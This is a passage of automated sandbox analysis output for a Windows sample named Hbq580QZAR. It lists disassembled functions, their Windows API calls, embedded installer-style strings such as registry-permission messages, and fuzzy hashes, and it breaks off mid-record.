                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                            • String ID:
                                                                                            • API String ID: 3527656728-0
                                                                                            • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                            • Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
                                                                                            • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                            • Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateFileHandle
                                                                                            • String ID: !nI$.tmp$_iu
                                                                                            • API String ID: 3498533004-584216493
                                                                                            • Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                            • Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
                                                                                            • Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                            • Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                                                            APIs
                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            • ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                              • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                              • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                            • String ID: .dat$.msg$IMsg$Uninstall
                                                                                            • API String ID: 3312786188-1660910688
                                                                                            • Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                            • Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
                                                                                            • Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                            • Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                            • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                            • API String ID: 828529508-2866557904
                                                                                            • Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                            • Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
                                                                                            • Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                            • Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
                                                                                            APIs
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                                                            • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                            • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                            • API String ID: 2573145106-3235461205
                                                                                            • Opcode ID: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                            • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                                                            • Opcode Fuzzy Hash: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                            • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                            • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                            • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                            • API String ID: 3478007392-2498399450
                                                                                            • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                            • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                                                            • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                            • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                                                            APIs
                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                            • String ID: AllowSetForegroundWindow$user32.dll
                                                                                            • API String ID: 1782028327-3855017861
                                                                                            • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                            • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                                                            • Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                            • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
                                                                                            APIs
                                                                                            • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                                            • SaveDC.GDI32(?), ref: 00416C83
                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                                            • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                                            • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                            • String ID:
                                                                                            • API String ID: 3808407030-0
                                                                                            • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                            • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                            • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                            • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                            • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                                            • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                            • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                                            • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                                            • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                                            • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                            • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                                            • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                            • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                                            • GetDC.USER32(00000000), ref: 0041BC12
                                                                                            • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                                            • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                            • String ID:
                                                                                            • API String ID: 1095203571-0
                                                                                            • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                            • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                            • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                            • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                                            APIs
                                                                                              • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                                                            Strings
                                                                                            • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                                                            • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                                                            • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                            • API String ID: 1452528299-4018462623
                                                                                            • Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                            • Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
                                                                                            • Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                            • Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                            • String ID:
                                                                                            • API String ID: 262959230-0
                                                                                            • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                            • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                            • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                            • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                            APIs
                                                                                            • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                                                            • RealizePalette.GDI32(00000000), ref: 00414421
                                                                                            • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                                                            • RealizePalette.GDI32(00000000), ref: 0041443B
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Palette$RealizeSelect$Release
                                                                                            • String ID:
                                                                                            • API String ID: 2261976640-0
                                                                                            • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                            • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                                                            • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                            • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                                                            APIs
                                                                                              • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                                              • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                                              • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                                              • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                                                            • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                                                            • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                                                            • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                                              • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
                                                                                              • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                                              • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                                              • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                                                            • String ID: vLB
                                                                                            • API String ID: 1477829881-1797516613
                                                                                            • Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                            • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                                                            • Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                            • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                                                            APIs
                                                                                            • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                                                            • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                                                            • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
